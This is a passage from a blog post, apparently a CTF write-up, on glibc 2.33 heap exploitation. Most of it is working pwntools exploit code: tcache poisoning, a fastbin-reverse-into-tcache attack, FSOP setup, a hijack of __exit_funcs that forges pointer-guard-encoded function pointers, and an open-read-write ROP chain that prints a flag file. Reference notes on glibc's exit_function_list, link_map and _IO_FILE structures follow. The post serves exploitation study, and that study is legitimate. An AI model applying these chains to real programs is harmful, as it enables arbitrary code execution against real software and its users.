ropchain_addr = heap_base + 0xE00
ropchain = flat([add_rsp_0x28, ropchain_addr, rdi2rdx, 0, rdx2rsp])
ropchain += p64(0) # padding
ropchain += orw_payload(libc_base, ropchain_addr + 0x30)

for i in range((len(ropchain) + 8) // 0x10):
arbitrary_write(ropchain_addr + i*0x10, ropchain[i*0x10:(i+1)*0x10])

# prepare buffer for FSOP
arbitrary_write(heap_base + 0x160, p64(0) + p64(libc_base + libc.sym['__free_hook'] - 0x10)) # tcache bin (0x1D0) = &__free_hook - 8
arbitrary_write(heap_base + 0x40, p64(0x1000000000000) + p64(heap_base + 0xE00)) # tcache count (0x1D0) = 1

# clear fastbin
edit(0, "\x07")
delete(1)
edit(1, p64(heap_base >> 12))
edit(0, "\x00")
add(1)

# trigger exit
delete(1)
edit(0, "\x02")
edit(1, p64((heap_base + 0x2000) ^ (heap_base >> 12)))
add(1)
add(2)
####################################


# #################################### Method 2: hijack __exit_funcs
# # leak heap base
# add(0)
# delete(0)
# add(0)
# show(0)
# p.recvuntil("Content:")
# heap_base = u64(p.recv(8)) << 12

# # leak libc base
# for i in range(0x23):
# add(1)
# add(2)
# delete(1)
# delete(2)
# edit(2, p64((heap_base + 0x290) ^ (heap_base >> 12)))
# add(1)
# add(1)
# edit(1, p64(0) + p64(0x421))
# delete(0)
# add(0)
# show(0)
# p.recvuntil("Content:")
# libc_base = u64(p.recv(8)) - 0x1e0ba0 - 0x450

# # malloc tcache_struct
# add(1)
# delete(0)
# delete(1)
# edit(1, p64((heap_base + 0x10) ^ (heap_base >> 12)))
# add(0)
# add(0) # chunk 0 points to tcache_struct

# # prepare fastbin
# add(1)
# for i in range(5):
# add(2)
# edit(2, p64((heap_base + 0x310 + 0x20 * i) ^ (heap_base >> 12)))
# add(2)
# edit(2, p64((libc_base + 0x1ed630 - 0x10) ^ (heap_base >> 12))) # __exit_funcs
# edit(0, "\x07") # "fill" the tcache bin
# delete(1) # put into fastbin
# edit(1, p64((heap_base + 0x2F0) ^ (heap_base >> 12))) # prepare for fastbin reverse into tcache attack

# # fastbin reverse into tcache attack, this will change fs:[0x30] to (heapbase + 0x3a0) ^ ((libc_base + 0x1ed630) >> 12)
# edit(0, "\x00") # "clear" the tcache bin
# add(1)
# __pointer_chk = (heap_base + 0x3a0) ^ ((libc_base + 0x1ed630) >> 12)

# # clear fastbin
# edit(0, "\x07")
# delete(1)
# edit(1, p64(heap_base >> 12))
# edit(0, "\x00")
# add(1)

# # ORW
# def orw_payload(libc_base, orwchain_base):
# pop_rdi = libc_base + 0x0000000000028a55 # pop rdi ; ret
# pop_rsi = libc_base + 0x000000000002a4cf # pop rsi ; ret
# pop_rdx = libc_base + 0x00000000000c7f32 # pop rdx ; ret
# func_cnt = 3
# args_cnt = 2 + 3 + 1
# payload = ""
# payload += flat([pop_rdi, orwchain_base + func_cnt * 8 + args_cnt * 0x10, pop_rsi, 0, libc_base + libc.sym['open']])
# payload += flat([pop_rdi, 3, pop_rsi, orwchain_base + 0x100, pop_rdx, 0x40, libc_base + libc.sym['read']])
# payload += flat([pop_rdi, orwchain_base + 0x100, libc_base + libc.sym['puts']])
# payload += "./flag"
# return payload

# rdi2rdx = libc_base + 0x000000000014a0a0 # mov rdx, qword ptr [rdi + 8] ; mov qword ptr [rsp], rax ; call qword ptr [rdx + 0x20]
# rdx2rsp = libc_base + 0x0000000000059020 # mov rsp, rdx ; ret
# add_rsp_0x28 = libc_base + 0x0000000000044ce5 # add rsp, 0x28 ; ret

# ropchain_addr = heap_base + 0xA00
# ropchain = flat([add_rsp_0x28, ropchain_addr, 0, 0, rdx2rsp])
# ropchain += p64(0) # padding
# ropchain += orw_payload(libc_base, ropchain_addr + 0x30)

# for i in range((len(ropchain) + 8) // 0x10):
# arbitrary_write(ropchain_addr + i*0x10, ropchain[i*0x10:(i+1)*0x10])

# # forge __exit_function
# edit(0, "\x00") # "clear" the tcache bin
# arbitrary_write(heap_base + 0x10, p64(0) + p64(1)) # exit_function_list->next = NULL, exit_function_list->idx = 1
# encoded_rdi2rdx = rdi2rdx ^ __pointer_chk
# encoded_rdi2rdx = ((encoded_rdi2rdx << 17) & ((1 << 64) - 1)) | (encoded_rdi2rdx >> (64 - 17))
# arbitrary_write(heap_base + 0x20, p64(4) + p64(encoded_rdi2rdx)) # exit_function_list->fns[0].flavor = ef_cxa(0x4), exit_function_list->fns[0].cxa.fn = rdi2rdx
# arbitrary_write(heap_base + 0x30, p64(ropchain_addr)) # exit_function_list->fns[0].cxa.arg = ropchain_addr

# # prepare fastbin
# add(1)
# for i in range(5):
# add(2)
# edit(2, p64((heap_base + 0x3f0 + 0x20 * i) ^ (heap_base >> 12)))
# add(2)
# edit(2, p64((libc_base + 0x1E0738 - 0x18) ^ (heap_base >> 12))) # __exit_funcs
# edit(0, "\x07") # "fill" the tcache bin
# delete(1) # put into fastbin
# edit(1, p64((heap_base + 0x3d0) ^ (heap_base >> 12))) # prepare for fastbin reverse into tcache attack

# # fastbin reverse into tcache attack, this will change __exit_funcs
# edit(0, "\x00") # "clear" the tcache bin
# add(1)

# # clear fastbin
# edit(0, "\x07")
# delete(1)
# edit(1, p64(heap_base >> 12))
# edit(0, "\x00")
# add(1)

# # trigger exit
# delete(1)
# edit(0, "\x02")
# edit(1, p64((heap_base + 0x2000) ^ (heap_base >> 12)))
# add(1)
# add(2)
# #####################################

success("libc_base: " + hex(libc_base))
success("heap_base: " + hex(heap_base))

p.interactive()

'''
_exit_funcs (struct exit_functions_list **):

struct exit_function_list
{
struct exit_function_list *next;
size_t idx;
struct exit_function fns[32];
};

struct exit_function
{
/* `flavour' should be of type of the `enum' above but since we need
this element in an atomic operation we have to use `long int'. */
long int flavor;
union
{
void (*at) (void);
struct
{
void (*fn) (int status, void *arg);
void *arg;
} on;
struct
{
void (*fn) (void *arg, int status);
void *arg;
void *dso_handle;
} cxa;
} func;
};
'''

'''
_rtld_global->_dl_ns[0]->_ns_loaded: (link map)
offset member
0x0 l_addr (point to program base by default)
0x18 l_next (point to next link map, the length of the linked list should be no smaller than 4, and the tial nodes's l_next = 0)
0x20 l_prev (point to previous link map, head node's l_prev = 0)
0x110 l_info[0x1A] (
point to fini_array Elf64_Dyn structure:
typedef struct
{
Elf64_Sxword d_tag; /* Dynamic entry type */
union
{
Elf64_Xword d_val; /* Integer value */
Elf64_Addr d_ptr; /* Address value */
// l_info[0x1A]->d_un.d_ptr + l_addr = &fini_array
} d_un;
} Elf64_Dyn;)
)
0x120 l_info[0x1C] (point to fini_array_size Elf64_Dyn structure) // l_info[0x1C]->d_un.d_val= sizeof(fini_array)
'''


'''
struct _IO_FILE
{
int _flags; /* High-order word is _IO_MAGIC; rest is flags. */ 0x10

/* The following pointers correspond to the C++ streambuf protocol. */
char *_IO_read_ptr; /* Current read pointer */ 0x18
char *_IO_read_end; /* End of get area. */ 0x20
char *_IO_read_base; /* Start of putback+get area. */ 0x28
char *_IO_write_base; /* Start of put area. */ 0x30
char *_IO_write_ptr; /* Current put pointer. */ 0x38
char *_IO_write_end; /* End of put area. */ 0x40
char *_IO_buf_base; /* Start of reserve area. */ 0x48
char *_IO_buf_end; /* End of reserve area. */ 0x50

/* The following fields are used to support backing up and undo. */
char *_IO_save_base; /* Pointer to start of non-current get area. */ 0x58
char *_IO_backup_base; /* Pointer to first valid character of backup area */ 0x60
char *_IO_save_end; /* Pointer to end of non-current get area. */ 0x68

struct _IO_marker *_markers; 0x70

struct _IO_FILE *_chain; 0x78

int _fileno; 0x80
int _flags2; 0x84
__off_t _old_offset; /* This used to be _offset but it's too small. */

/* 1+column number of pbase(); 0 is unknown. */
unsigned short _cur_column;
signed char _vtable_offset;
char _shortbuf[1];

_IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};
'''

参考

  1. https://www.anquanke.com/post/id/222948
  2. https://www.anquanke.com/post/id/242640
  3. https://elixir.bootlin.com/glibc/glibc-2.33
Author: Nop
Link: https://n0nop.com/2021/11/27/Glibc-2-33%E5%88%A9%E7%94%A8%E6%8A%80%E5%B7%A7/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.